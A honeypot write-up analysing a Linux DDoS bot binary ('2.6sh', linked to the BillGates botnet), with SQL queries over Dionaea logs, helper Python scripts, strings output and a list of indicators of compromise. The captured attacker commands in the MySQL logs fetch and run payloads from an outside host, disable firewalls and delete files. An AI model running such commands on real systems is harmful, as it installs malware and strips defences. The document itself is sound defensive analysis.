Spare time with "2.6sh"

"I'm live!" I decided to publish a small post out of spare time, related to gathering indicators of compromises based on collected data from my honeypot. I was going to do a small project with my Raspberry Pi but it seems to have been misplaced... but i'll save that tidbit for later.

Today I will do a quick pass over a binary called "2.6sh", but before I can do that one question should be asked: "How did you come across this sample?" Glad you asked... let's get started.

How did you come across this sample?

Currently, I run a honeypot called Dionaea on a machine out in the deep dark internet. Dionaea's main purpose is to expose emulated vulnerable services to attackers, in the hope of obtaining copies of the malware that may be exploiting other systems in the wild. Some of the services emulated by Dionaea are MSSQL, MySQL, SIP, SMB, FTP, HTTP and so on. This is not the only tool I use for monitoring malicious activity. Another, which passively monitors the network, is Bro NSM (since renamed Zeek), or simply "Bro." This is an extremely awesome framework that gives you in-depth analysis of your network traffic. If you have not heard of or given Bro a chance, I highly recommend you try it out. Now that I have gotten that out of the way, you are probably saying "could you please get on with the finding and analysis" :).

The Finding

Looking at the logs, I noticed there were some MySQL connections to the honeypot, so of course I pulled the Bro and Dionaea logs. Given the large amount of MySQL noise seen on the internet, I knew I had to quickly narrow things down to the fun artifacts, so I decided to pull the Dionaea logs first. These give not only the brute-forcing logs (username/password combos) but also the MySQL commands with their arguments and the time at which those events were executed. One artifact that stuck out on the initial gleaning of the logs was an attempted file download named "2.6sh" from a remote IP address.

Pulling from the mysql_command_args table in Dionaea's SQLite database, a search for "2.6sh" reveals the following:

Search for "2.6sh"

sqlite> .schema mysql_command_args  
    CREATE TABLE mysql_command_args (
                mysql_command_arg INTEGER PRIMARY KEY,
                mysql_command INTEGER,
                mysql_command_arg_index NUMBER NOT NULL,
                mysql_command_arg_data TEXT NOT NULL
                -- CONSTRAINT mysql_commands_connection_fkey FOREIGN KEY (connection) REFERENCES connections (connection)
            );

sqlite> select * from mysql_command_args where mysql_command_arg_data like '%2.6sh%';
25804|43428|0|select sys_eval("wget http://222.186.15.135:7788/2.6sh;chmod 0755 2.6sh;./2.6sh;")
25805|43429|0|select sys_eval("chmod 777 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;")  
25806|43430|0|select sys_eval("chmod 0777 2.6sh;chmod u+x 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;chattr +i 2.6sh;")  
25826|43451|0|select sys_eval("wget http://222.186.15.135:7788/2.6sh;chmod 0755 2.6sh;./2.6sh;")  
25827|43452|0|select sys_eval("chmod 777 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;")  
25828|43453|0|select sys_eval("chmod 0777 2.6sh;chmod u+x 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;chattr +i 2.6sh;")  
26320|44439|0|select sys_eval("wget http://222.186.15.135:7788/2.6sh;chmod 0755 2.6sh;./2.6sh;")  
26321|44440|0|select sys_eval("chmod 777 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;")  
26322|44441|0|select sys_eval("chmod 0777 2.6sh;chmod u+x 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;chattr +i 2.6sh;")  

With this newly discovered information, we can now dive a bit deeper into our data set to see what else has been captured in Dionaea. Let's start by looking for that IP address in the connections and mysql_command_args tables.

Malicious IP Connections

sqlite> .schema connections  
    CREATE TABLE connections    (
                connection INTEGER PRIMARY KEY,
                connection_type TEXT,
                connection_transport TEXT,
                connection_protocol TEXT,
                connection_timestamp INTEGER,
                connection_root INTEGER,
                connection_parent INTEGER,
                local_host TEXT,
                local_port INTEGER,
                remote_host TEXT,
                remote_hostname TEXT,
                remote_port INTEGER
            );

sqlite> select * from connections where remote_host = '222.186.15.135';  
431890|accept|tcp|mysqld|1442151157.86037|431890||96.126.122.224|3306|222.186.15.135||1186  
431892|accept|tcp|mysqld|1442151159.6204|431892||96.126.122.224|3306|222.186.15.135||1310  
451981|accept|tcp|mysqld|1442781286.83636|451981||96.126.122.224|3306|222.186.15.135||3502  
451983|accept|tcp|mysqld|1442781417.54318|451983||96.126.122.224|3306|222.186.15.135||3835  
452249|accept|tcp|mysqld|1442791680.71157|452249||96.126.122.224|3306|222.186.15.135||2158  
452251|accept|tcp|mysqld|1442791688.01481|452251||96.126.122.224|3306|222.186.15.135||2412  
500827|accept|tcp|mysqld|1444237762.53936|500827||96.126.122.224|3306|222.186.15.135||4617  
500829|accept|tcp|mysqld|1444237769.40262|500829||96.126.122.224|3306|222.186.15.135||1886  

Looking at the output from the connections table, we can narrow things down to the timeframes of these events, and from those timeframes pull Bro logs to determine whether there was any other related traffic besides MySQL. The connection_timestamp column is epoch seconds, the same clock Bro uses in its ts field, so the two data sets line up without any conversion. I created a quick epochtime_convert.py Python script to make the times readable (note that it prints them in the analyst machine's local timezone):

Timeframe from Connections

#!/usr/bin/env python
# epochtime_convert.py - turn Dionaea/Bro epoch timestamps into readable times.
import argparse
import time

parser = argparse.ArgumentParser(description='Converts epoch time to local time')
parser.add_argument('epochtime', type=float, nargs='+',
                    help='Example: 1444237762.53936')
args = parser.parse_args()

# Epoch seconds are UTC by definition; localtime() renders them in this
# machine's timezone, so note the zone when sharing times (time.gmtime for UTC).
for epoch in args.epochtime:
    print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(epoch)))
$ python epochtime_convert.py 1442151157.86037 1442151159.6204 1442781286.83636 1442781417.54318 1442791680.71157 1442791688.01481 1444237762.53936 1444237769.40262
2015-09-13 06:32:37
2015-09-13 06:32:39
2015-09-20 13:34:46
2015-09-20 13:36:57
2015-09-20 16:28:00
2015-09-20 16:28:08
2015-10-07 10:09:22
2015-10-07 10:09:29
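The step described above, pulling Bro traffic around each Dionaea timestamp, is easy to script. The following is an added example of my own, not code from the original post: it parses Bro's tab-separated conn.log, keeps every flow where the attacker is either endpoint, and filters those to a window of a few minutes around each mysqld connection time taken from the connections table. The conn.log excerpt is constructed for the example; its three mysqld rows mirror real connections above, while the SSH probe, the flow to the 7788 download port, the unrelated 198.51.100.7 client and the out-of-window flow are made up to show what the filter keeps and drops.

```python
# Added example, not from the original post: correlate Dionaea mysqld
# connection timestamps with Bro conn.log flows for the same remote host.

ATTACKER = "222.186.15.135"

# Epoch timestamps of the mysqld connections from 222.186.15.135, copied from
# the Dionaea connections table in the post.
DIONAEA_TIMESTAMPS = [
    1442151157.86037, 1442151159.6204,
    1442781286.83636, 1442781417.54318,
    1442791680.71157, 1442791688.01481,
    1444237762.53936, 1444237769.40262,
]

# Constructed conn.log excerpt in Bro's ASCII format (tab-separated, '#'
# header lines). Rows Cb2, Cc3 and Cf6 mirror real Dionaea connections; the
# others (SSH probe, honeypot-to-7788 flow, another client, far-off flow) are
# made up for illustration.
BRO_CONN_LOG = "\n".join([
    "#separator \\x09",
    "#path\tconn",
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tconn_state",
    "#types\ttime\tstring\taddr\tport\taddr\tport\tenum\tstring\tstring",
    "1442151102.112000\tCa1\t222.186.15.135\t42311\t96.126.122.224\t22\ttcp\t-\tREJ",
    "1442151157.860370\tCb2\t222.186.15.135\t1186\t96.126.122.224\t3306\ttcp\tmysql\tSF",
    "1442151159.620400\tCc3\t222.186.15.135\t1310\t96.126.122.224\t3306\ttcp\tmysql\tSF",
    "1442151200.005000\tCd4\t96.126.122.224\t51022\t222.186.15.135\t7788\ttcp\thttp\tS0",
    "1442200000.000000\tCe5\t198.51.100.7\t55000\t96.126.122.224\t3306\ttcp\tmysql\tSF",
    "1442500000.000000\tCg7\t222.186.15.135\t40001\t96.126.122.224\t3306\ttcp\tmysql\tSF",
    "1444237762.539360\tCf6\t222.186.15.135\t4617\t96.126.122.224\t3306\ttcp\tmysql\tSF",
    "#close\t2015-10-07-23-59-59",
])


def parse_conn_log(text):
    """Parse Bro's ASCII log: the '#fields' header names the columns, other
    '#' lines are metadata, everything else is one tab-separated record."""
    fields = None
    rows = []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def related_flows(rows, host, anchors, window=300.0):
    """Flows where `host` is either endpoint and the start time lies within
    `window` seconds of any anchor timestamp, in log order."""
    return [
        r for r in rows
        if host in (r["id.orig_h"], r["id.resp_h"])
        and any(abs(float(r["ts"]) - a) <= window for a in anchors)
    ]


def non_mysql(flows):
    """The interesting subset: anything that is not the honeypot's MySQL port."""
    return [r for r in flows if r["id.resp_p"] != "3306"]


if __name__ == "__main__":
    rows = parse_conn_log(BRO_CONN_LOG)
    hits = related_flows(rows, ATTACKER, DIONAEA_TIMESTAMPS)
    for r in hits:
        print(r["ts"], r["uid"], r["id.orig_h"], "->", r["id.resp_h"], r["id.resp_p"], r["service"])
    print("non-MySQL flows:", [r["uid"] for r in non_mysql(hits)])
```

On a real conn.log the window is the knob to tune: five minutes catches the scan that usually precedes the MySQL login, while a much wider window on a busy honeypot starts pulling in unrelated noise from the same /24.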

Malicious IP MYSQL CMDS

sqlite> select * from mysql_command_args where mysql_command_arg_data like '%222.186.15.135%';  
25061|42230|0|select sys_eval("wget http://222.186.15.135:358/lymm;chmod 777 lymm;./lymm;chmod +i lymm;")  
25062|42231|0|select sys_eval("wget http://222.186.15.135:358/lymm;chmod 777 lymm;./lymm;")  
25410|42897|0|select sys_eval("wget http://222.186.15.135:358/lymm;chmod 777 lymm;./lymm;chmod +i lymm;")  
25411|42898|0|select sys_eval("wget http://222.186.15.135:358/lymm;chmod 777 lymm;./lymm;")  
25412|42899|0|system wget http://222.186.15.135:358/lymm  
25415|42902|0|select sys_eval("/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.15.135:358/lymm;chmod 777 lymm;./lymm;")  
25416|42903|0|select sys_eval("wget -O /tmp/lymm http://222.186.15.135:358/lymm;chmod 0755 /lymm;nohup /tmp/lymm > /dev/null 2>&1 &;")  
25417|42904|0|select sys_eval("rm *;curl -o /tmp/rotini http://222.186.15.135:358/lymm;wget -c http://222.186.15.135:358/lymm;chmod 777 /tmp/./lymm;/tmp/./lymm;rm /tmp/*;")  
25537|43124|0|system wget http://222.186.15.135:358/keeplive  
25576|43165|0|system wget http://222.186.15.135:358/keeplive  
25615|43206|0|system wget http://222.186.15.135:358/keeplive  
25804|43428|0|select sys_eval("wget http://222.186.15.135:7788/2.6sh;chmod 0755 2.6sh;./2.6sh;")  
25826|43451|0|select sys_eval("wget http://222.186.15.135:7788/2.6sh;chmod 0755 2.6sh;./2.6sh;")  
26320|44439|0|select sys_eval("wget http://222.186.15.135:7788/2.6sh;chmod 0755 2.6sh;./2.6sh;")  
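The two lookups above (find the command text, then look up the connection by hand) can be collapsed into one query. The following is an added example of my own, not code from the post: it rebuilds the two tables whose schema is shown above in an in-memory SQLite database, joins mysql_command_args back to connections through Dionaea's mysql_commands table, and then pulls the download URLs out of the sys_eval() payloads as IOCs. The mysql_commands table is not shown in the post; its columns (mysql_command, connection, mysql_command_cmd) follow Dionaea's logsql schema as I know it and should be treated as an assumption, as should the three rows I constructed to link the 2.6sh commands to connection 431890 (command type 3 is MySQL's COM_QUERY). The connection row and the three argument rows are copied from the output above.

```python
# Added example, not from the original post: join Dionaea's MySQL command
# arguments to the connection that carried them, then extract download URLs.
import re
import sqlite3

# connections and mysql_command_args are copied from the post's .schema output.
# mysql_commands is not shown in the post; this is the Dionaea logsql layout as
# I know it (assumption).
SCHEMA = """
CREATE TABLE connections (
    connection INTEGER PRIMARY KEY, connection_type TEXT, connection_transport TEXT,
    connection_protocol TEXT, connection_timestamp INTEGER, connection_root INTEGER,
    connection_parent INTEGER, local_host TEXT, local_port INTEGER,
    remote_host TEXT, remote_hostname TEXT, remote_port INTEGER);
CREATE TABLE mysql_commands (
    mysql_command INTEGER PRIMARY KEY, connection INTEGER,
    mysql_command_cmd NUMBER NOT NULL);
CREATE TABLE mysql_command_args (
    mysql_command_arg INTEGER PRIMARY KEY, mysql_command INTEGER,
    mysql_command_arg_index NUMBER NOT NULL, mysql_command_arg_data TEXT NOT NULL);
"""

# Connection 431890 and argument rows 25804..25806 are taken from the post.
CONNECTIONS = [
    (431890, "accept", "tcp", "mysqld", 1442151157.86037, 431890, None,
     "96.126.122.224", 3306, "222.186.15.135", "", 1186),
]
# Constructed link rows (the post does not show mysql_commands); 3 = COM_QUERY.
MYSQL_COMMANDS = [(43428, 431890, 3), (43429, 431890, 3), (43430, 431890, 3)]
MYSQL_COMMAND_ARGS = [
    (25804, 43428, 0, 'select sys_eval("wget http://222.186.15.135:7788/2.6sh;chmod 0755 2.6sh;./2.6sh;")'),
    (25805, 43429, 0, 'select sys_eval("chmod 777 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;")'),
    (25806, 43430, 0, 'select sys_eval("chmod 0777 2.6sh;chmod u+x 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;chattr +i 2.6sh;")'),
]

# Who sent a matching command, when (epoch), and what it was, in one query.
QUERY = """
SELECT c.remote_host, c.connection_timestamp, a.mysql_command_arg_data
FROM mysql_command_args AS a
JOIN mysql_commands AS m ON m.mysql_command = a.mysql_command
JOIN connections AS c ON c.connection = m.connection
WHERE a.mysql_command_arg_data LIKE ?
ORDER BY c.connection_timestamp, a.mysql_command_arg
"""

# A URL inside a sys_eval() payload ends at whitespace, ';' or a quote.
URL_RE = re.compile(r'https?://[^\s;"\']+')


def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany("INSERT INTO connections VALUES (?,?,?,?,?,?,?,?,?,?,?,?)", CONNECTIONS)
    db.executemany("INSERT INTO mysql_commands VALUES (?,?,?)", MYSQL_COMMANDS)
    db.executemany("INSERT INTO mysql_command_args VALUES (?,?,?,?)", MYSQL_COMMAND_ARGS)
    return db


def commands_matching(db, needle):
    """(remote_host, epoch, command) for every command containing `needle`."""
    return db.execute(QUERY, ("%" + needle + "%",)).fetchall()


def download_urls(rows):
    """Distinct URLs found in the command text, in first-seen order."""
    seen = []
    for _, _, data in rows:
        for url in URL_RE.findall(data):
            if url not in seen:
                seen.append(url)
    return seen


if __name__ == "__main__":
    db = build_db()
    rows = commands_matching(db, "2.6sh")
    for host, ts, data in rows:
        print(host, ts, data)
    print("download URLs:", download_urls(rows))
```

Against the live logsql.sqlite you would drop build_db() and open the file instead; the query is the same, and swapping the needle for "sys_eval" or "http://" gives a quick sweep of every download command the honeypot has ever seen.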

After getting a view of what the honeypot caught, I decided to go ahead and pull down the "2.6sh" artifact to do some reverse engineering (RE) of the executable.

File Information

$ file 2.6sh
2.6sh: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped  

Now the name "2.6sh" starts to make sense. Seeing that this file is an ELF executable rather than a shell script, the name may be meant to make it look like a harmless shell script for 2.6.x kernels while a binary is actually being downloaded and executed (the "for GNU/Linux 2.2.5" in the file output is just the minimum kernel ABI recorded in the binary's note section, not a target). The output also says the binary is statically linked and not stripped, which is what makes the string and symbol analysis below so easy. This is of course all speculation until you actually do some static analysis.

Static to IOCs

Loading this binary into IDA Pro, you almost immediately notice that it is not packed and has function names intact. Looking at the strings view, you notice several artifacts which indicate a DDoS-style bot. The length-prefixed names below are C++ RTTI type names (11CAttackBase is the type name of class CAttackBase), left behind because the binary is unstripped, and they read like a menu of attack methods: UDP, SYN, ICMP and DNS floods plus an amplification class.

<--snip-->  
.rodata:080F18FC 0000000E C 11CAttackBase
.rodata:080F190A 00000010 C 13CPacketAttack
.rodata:080F1928 0000000D C 10CAttackUdp
.rodata:080F1944 0000000D C 10CAttackSyn
.rodata:080F1960 0000000E C 11CAttackIcmp
.rodata:080F197C 0000000D C 10CAttackDns
.rodata:080F1998 0000000D C 10CAttackAmp
.rodata:080F19B4 0000000D C 10CAttackPrx
.rodata:080F19D0 00000012 C 15CAttackCompress
.rodata:080F19F0 0000000D C 10CTcpAttack
.rodata:080F1A0C 0000000B C 9CAttackCc
.rodata:080F1A24 0000000B C 9CAttackIe
.rodata:080F1D0C 00000009 C 7CSerial
<--snip-->  
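You do not need IDA to recover these names. The following is an added example of my own, not code from the post: it scans a byte blob the way strings(1) does and keeps only the runs whose decimal prefix equals the length of the identifier that follows, which is how the Itanium C++ ABI encodes a plain class name in its typeinfo string. The .rodata blob is constructed from the names shown above plus a few filler strings that should be rejected; the real binary was not used.

```python
# Added example, not from the original post: pull C++ class names out of an
# unstripped binary by looking for <length><identifier> typeinfo strings.
import re

# Constructed stand-in for a slice of .rodata: NUL-separated strings. The class
# names are the ones in the IDA strings view above; "wget", "12345" and
# "99CNotAClass" are filler to show what gets rejected.
RODATA = (
    b"\x00wget\x0011CAttackBase\x0013CPacketAttack\x0010CAttackUdp\x00"
    b"10CAttackSyn\x0011CAttackIcmp\x0010CAttackDns\x0010CAttackAmp\x00"
    b"10CAttackPrx\x0015CAttackCompress\x0010CTcpAttack\x009CAttackCc\x00"
    b"9CAttackIe\x0012345\x007CSerial\x0099CNotAClass\x00"
)

# Runs of printable ASCII, same idea as strings(1).
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")
# <decimal length><C identifier>. Only plain, non-namespaced names are handled,
# which is all this sample has; namespaced names (N...E) need a real demangler.
TYPEINFO_NAME = re.compile(rb"^(\d+)([A-Za-z_][A-Za-z0-9_]*)$")


def typeinfo_class_names(data):
    """Class names whose length prefix matches the identifier, in file order."""
    names = []
    for run in PRINTABLE_RUN.findall(data):
        m = TYPEINFO_NAME.match(run)
        if m and int(m.group(1)) == len(m.group(2)):
            names.append(m.group(2).decode("ascii"))
    return names


if __name__ == "__main__":
    for name in typeinfo_class_names(RODATA):
        print("class", name)
```

The length check is what keeps this from being a noisy "digits followed by letters" grep: "99CNotAClass" is dropped because the identifier is ten characters long, not ninety-nine. Run it over the whole file (open(path, "rb").read()) and you get the class list in seconds, which is plenty for the quick-IOC pass this post is doing.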

Along with the attack classes, you can also glean several IP addresses, update commands, user-agent strings and possible file names. Typically I would continue to dive deeper and do some RE, but I want to gather quick indicators of compromise (IOCs) before diving into anything that might pique my interest. This helps with pre-research, so that time is not spent looking into something that has already been discovered. Continuing through the strings view, I researched some artifacts and found that this binary is associated with a botnet called "BillGates". More information can be found at https://securelist.com/analysis/publications/64361/versatile-ddos-trojan-for-linux/ and the original source http://habrahabr.ru/post/213973/.

Conclusion and IOCs

Given there is enough data out there related to this particular botnet (though not this particular variant), there is no need for me to RE the binary any further. With that said, enjoy the list of IOCs for further research.

Hashes

MD5:    c074a4c2ca44c50aa5d20fb5a4d4a11b
SHA256: 385fe7a6089a4668c3cb69a38ff7f1d934000b227a6c85ba6e6bd44c02c5b350

Files

/home/monitor/Gates
/usr/lib/xpacket.ko
/usr/lib/libamplify.so
/usr/bin/.sshd
/tmp/moni.lock
/tmp/bill.lock
/tmp/notify.file
/etc/conf.n
/etc/cmd.n
/etc/rc*.d/97DbSecuritySpt

User-Agent

"Mozilla/5.0 (|S|) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/|D&23&25|.|D&0&9|.|D&1000&9000|.|D&10&99| Safari/537.17"
"Mozilla/5.0 (|S|; rv:18.0) Gecko/20100101 Firefox/18.0"
"Opera/|D&7&9|.|D&70&90| (|S|) Presto/2.|D&8&18|.|D&90&890| Version/|D&11&12|.|D&10&19|"

IP addresses

Note that many of these are well-known public recursive DNS resolvers (114.114.114.114 and 168.95.1.1, for example), which fits the CAttackDns and CAttackAmp classes seen in the strings: they are most likely resolvers the bot abuses for DNS amplification, hard-coded in the sample, rather than command-and-control. Treat them as "this host is attacking" indicators in outbound traffic, not as addresses to put on a blocklist.

61.132.163.68  
202.102.192.68  
202.102.213.68  
202.102.200.101  
58.242.2.2  
202.38.64.1  
211.91.88.129  
211.138.180.2  
218.104.78.2  
202.102.199.68  
202.175.3.3  
202.175.3.8  
202.112.144.30  
61.233.9.9  
61.233.9.61  
124.207.160.110  
202.97.7.6  
202.97.7.17  
202.106.0.20  
202.106.46.151  
202.106.195.68  
202.106.196.115  
202.106.196.212  
202.106.196.228  
202.106.196.230  
202.106.196.232  
202.106.196.237  
202.112.112.10  
211.136.17.107  
211.136.28.231  
211.136.28.234  
211.136.28.237  
211.147.6.3  
219.141.136.10  
219.141.140.10  
219.141.148.37  
219.141.148.39  
219.239.26.42  
221.130.32.100  
221.130.32.103  
221.130.32.106  
221.130.32.109  
221.130.33.52  
221.130.33.60  
221.176.3.70  
221.176.3.73  
221.176.3.76  
221.176.3.79  
221.176.3.83  
221.176.3.85  
221.176.4.6  
221.176.4.9  
221.176.4.12  
221.176.4.15  
221.176.4.18  
221.176.4.21  
58.22.96.66  
218.104.128.106  
202.101.98.55  
211.138.145.194  
211.138.151.161  
211.138.156.66  
218.85.152.99  
218.85.157.99  
222.47.29.93  
202.101.107.85  
119.233.255.228  
222.47.62.142  
122.72.33.240  
211.98.121.27  
218.203.160.194  
221.7.34.10  
61.235.70.98  
113.111.211.22  
202.96.128.68  
202.96.128.86  
202.96.128.166  
210.21.3.140  
210.21.4.130  
211.95.193.97  
211.98.2.4  
211.98.4.1  
211.162.61.225  
211.162.61.235  
211.162.61.255  
211.162.62.1  
211.162.62.60  
221.4.66.66  
202.103.176.22  
202.96.144.47  
210.38.192.33  
202.96.134.33  
202.96.134.133  
202.96.154.15  
210.21.196.6  
221.5.88.88  
202.103.243.112  
202.193.64.33  
61.235.164.13  
61.235.164.18  
202.103.225.68  
221.7.136.68  
202.103.224.68  
211.97.64.129  
211.138.240.100  
211.138.242.18  
211.138.245.180  
221.7.128.68  
222.52.118.162  
202.98.192.67  
202.98.198.167  
211.92.136.81  
211.139.1.3  
211.139.2.18  
202.100.192.68  
211.97.96.65  
211.138.164.6  
221.11.132.2  
202.100.199.8  
202.99.160.68  
202.99.166.4  
202.99.168.8  
222.222.222.222  
202.102.224.68  
202.102.227.68  
222.85.85.85  
222.88.88.88  
210.42.241.1  
202.196.64.1  
112.100.100.100  
202.97.224.68  
219.235.127.1  
61.236.93.33  
211.93.24.129  
211.137.241.34  
219.147.198.230  
202.103.0.68  
202.103.0.117  
202.103.24.68  
202.103.44.150  
202.114.0.242  
202.114.240.6  
211.161.158.11  
211.161.159.3  
218.104.111.114  
218.104.111.122  
218.106.127.114  
218.106.127.122  
221.232.129.30  
59.51.78.210  
61.234.254.5  
202.103.96.112  
219.72.225.253  
222.243.129.81  
222.246.129.80  
211.142.210.98  
211.142.210.100  
220.168.208.3  
220.168.208.6  
220.170.64.68  
218.76.192.100  
61.187.98.3  
61.187.98.6  
202.98.0.68  
211.93.64.129  
211.141.16.99  
202.98.5.68  
219.149.194.55  
211.138.200.69  
202.102.3.141  
202.102.3.144  
58.240.57.33  
112.4.0.55  
114.114.114.114  
114.114.115.115  
202.102.24.34  
218.2.135.1  
221.6.4.66  
221.131.143.69  
202.102.8.141  
222.45.0.110  
61.177.7.1  
218.104.32.106  
211.103.13.101  
221.228.255.1  
61.147.37.1  
222.45.1.40  
58.241.208.46  
202.102.9.141  
202.102.7.90  
202.101.224.68  
202.101.226.68  
211.141.90.68  
211.137.32.178  
202.96.69.38  
211.140.197.58  
219.149.6.99  
202.96.86.18  
101.47.189.10  
101.47.189.18  
118.29.249.50  
118.29.249.54  
202.96.64.68  
202.96.75.68  
202.118.1.29  
202.118.1.53  
219.148.204.66  
202.99.224.8  
202.99.224.67  
211.90.72.65  
211.138.91.1  
218.203.101.3  
202.100.96.68  
211.93.0.81  
222.75.152.129  
211.138.75.123  
202.102.154.3  
202.102.152.3  
219.146.1.66  
219.147.1.66  
202.102.128.68  
202.102.134.68  
211.138.106.19  
211.90.80.65  
202.99.192.66  
202.99.192.68  
61.134.1.4  
202.117.96.5  
202.117.96.10  
218.30.19.40  
218.30.19.50  
116.228.111.118  
180.168.255.18  
202.96.209.5  
202.96.209.133  
202.101.6.2  
211.95.1.97  
211.95.72.1  
211.136.112.50  
211.136.150.66  
119.6.6.6  
124.161.97.234  
124.161.97.238  
124.161.97.242  
61.139.2.69  
202.98.96.68  
202.115.32.36  
202.115.32.39  
218.6.200.139  
218.89.0.124  
61.139.54.66  
61.139.39.73  
139.175.10.20  
139.175.55.244  
139.175.150.20  
139.175.252.16  
168.95.1.1  
210.200.211.193  
210.200.211.225  
211.78.130.1  
61.31.1.1  
61.31.233.1  
168.95.192.1  
168.95.192.174  
61.60.224.3  
61.60.224.5  
202.113.16.10  
202.113.16.11  
202.99.96.68  
202.99.104.68  
211.137.160.5  
211.137.160.185  
219.150.32.132  
202.98.224.68  
211.139.73.34  
61.10.0.130  
61.10.1.130  
202.14.67.4  
202.14.67.14  
202.45.84.58  
202.45.84.67  
202.60.252.8  
202.85.128.32  
203.80.96.9  
203.142.100.18  
203.142.100.21  
203.186.94.20  
203.186.94.241  
221.7.1.20  
61.128.114.133  
61.128.114.166  
218.202.152.130  
61.166.150.123  
202.203.128.33  
211.98.72.7  
211.139.29.68  
211.139.29.150  
211.139.29.170  
221.3.131.11  
222.172.200.68  
61.166.150.101  
61.166.150.139  
202.203.144.33  
202.203.160.33  
202.203.192.33  
202.203.208.33  
202.203.224.33  
211.92.144.161  
222.221.5.240  
61.166.25.129  
202.96.103.36  
221.12.1.227  
221.130.252.200  
222.46.120.5  
202.96.96.68  
218.108.248.219  
218.108.248.245  
61.130.254.34  
60.191.244.5  
202.96.104.15  
202.96.104.26  
221.12.33.227  
202.96.107.27  
61.128.128.68  
61.128.192.68  
218.201.17.2  
221.5.203.86  
221.5.203.90  
221.5.203.98  
221.7.92.86  
221.7.92.98  

3rd Party lookups based on initial network connection

The only results found were for the IP address of the initial event, and they did not contain the above IOCs. No results were found on VXshare. Although this binary hasn't been "found" as of yet, that does not mean a variant does not already exist and has been reported.

https://www.virustotal.com/nl/ip-address/222.186.15.135/information/
https://www.robtex.com/r/222.186.15.135:.html
https://urlquery.net/search.php?q=222.186.15.135&type=string&start=2011-06-25&end=2015-10-11&max=50